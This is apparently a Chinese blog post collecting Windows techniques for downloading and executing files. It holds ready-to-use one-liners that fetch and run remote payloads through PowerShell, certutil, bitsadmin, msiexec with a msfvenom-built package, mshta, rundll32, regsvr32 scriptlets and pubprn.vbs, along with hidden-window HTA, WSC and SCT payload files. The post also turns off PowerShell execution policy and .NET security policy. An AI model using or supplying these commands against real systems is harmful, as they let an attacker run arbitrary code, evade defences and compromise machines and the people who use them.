windows下载执行文件总结

发表于

Powershell

Powershell一般情况有策略限制可以通过更改执行策略或绕过来执行

1
2
Get-ExecutionPolicy 查看执行策略
Set-ExecutionPolicy UnRestricted 更改执行策略
1
2
$client = new-object System.Net.WebClient
$client.DownloadFile('url','path')
1
powershell(new-object System.Net.WebClient).DownloadFile('url','path')

IPC$

1
copy \\192.168.1.\file path

certutil

1
certutil -urlcache -split -f url filename

bitsadmin

1
bitsadmin /transfer n url path

msiexec

1
2
3
先生成msi文件
msfvenom -f msi -p windows/exec CMD=calc.exe>test.msi
msiexec /q /i http://192.168.1.1/test.msi

IEExec

1
2
3
IEExec自行在.net安装目录中找
caspol -s off关闭.net安全策略
IEExec http://192.168.1.1/test.exe

mshta

1
mshta http://192.168.1.1/run.hta

run.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
test
</body>
</HEAD> 
</HTML>

mshta执行vbscript

1
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

mshta执行javascript

1
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

rundll32

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.1/calc.wsc")

calc.wsc

1
2
3
4
5
6
7
8
9
10
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
</component>
</package>

rundll32执行hta

1
rundll32.exe url.dll,OpenURL "calc.hta"

calc.hta

1
2
3
4
5
<html><head><script>
a=new ActiveXObject("WScript.shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe',0);
window.close();
</script></head></html>

rundll32执行url

1
2
3
4
rundll32.exe ieframe.dll, OpenURL <本地URL 文件路径>
rundll32.exe url.dll, OpenURL <本地URL 文件路径>
rundll32.exe shdocvw.dll, OpenURL <本地URL 文件路径>
URL=file:///c:\windows\system32\calc.exe

regsvr32

1
regsvr32 /u /s /i:http://192.168.1.1/test.png scrobj.dll

test.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

pubprn.vbs

1
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

未完待续